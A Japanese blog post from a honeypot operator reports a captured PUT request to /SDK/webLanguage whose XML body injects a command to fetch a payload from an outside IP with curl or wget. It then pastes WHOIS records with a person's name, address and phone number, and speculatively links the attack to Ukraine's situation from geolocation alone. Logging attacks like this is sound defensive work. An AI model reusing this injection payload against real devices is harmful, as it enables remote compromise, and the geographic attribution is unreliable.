ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。
本日のログに初めて201レスポンスを返す攻撃が来ました。
HTTPリクエストに関しては下記リンクを参考にすると良いと思います。
201レスポンスのコードはこちら。
[2022-02-24 05:14:20+0900] 104.236.150.159 "PUT /SDK/webLanguage HTTP/1.1"
PUTでファイルを置きに来てる感がありますね。
PUT /SDK/webLanguage HTTP/1.1
User-Agent: curl/7.58.0
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 108
<?xml version="1.0" encoding="UTF-8"?><language>$(curl 45.94.156.22/hik || wget 45.94.156.22/hik)</language>
USと書いてありますが、ipアドレスにcurlコマンドとwgetで何かダウンロードしようとしています。
ipアドレスを調べてみた結果は以下になります。
inetnum: 45.94.156.0 - 45.94.156.255
netname: UA-HOSTIQ country: UA → (ウクライナ)
admin-c: SN7141-RIPE
tech-c: SN7141-RIPE
tech-c: AR22074-RIPE
status: ASSIGNED PA
mnt-by: HOSTIQ-MNT
created: 2019-08-07T11:08:10Z
last-modified: 2019-08-07T11:08:10Z
source: RIPErole: Abuse-C Role nic-hdl: AR22074-RIPE
org: ORG-PSMV2-RIPE
abuse-mailbox: abuse@vps.ua
mnt-by: VPSUA-MNT
address: 61015, Ukraine, Kharkiv, Donbasivskiy alley, 17, of. 59
created: 2014-08-14T13:49:57Z
last-modified: 2017-05-22T14:39:17Z
source: RIPE # Filtered
person: Skurikhin Nikolay
address: 61015, Kharkiv, Donbassovsky lane, 17, apartment 59
phone: +380503235698
nic-hdl: SN7141-RIPE
mnt-by: HOSTIQ-MNT
created: 2019-06-06T10:57:06Z
last-modified: 2019-06-06T10:57:06Z
source: RIPE
なんとウクライナから!!?
住所を調べるとハリコフがgooglemapで検索されました。
ハリコフってロシア国境付近ですよね・・・
この情勢に乗じての攻撃でしょうか・・
こういった世界的イベントや情勢の変化の時は攻撃なども活発になります。
今回はその良い例ではないでしょうか。
参考書籍
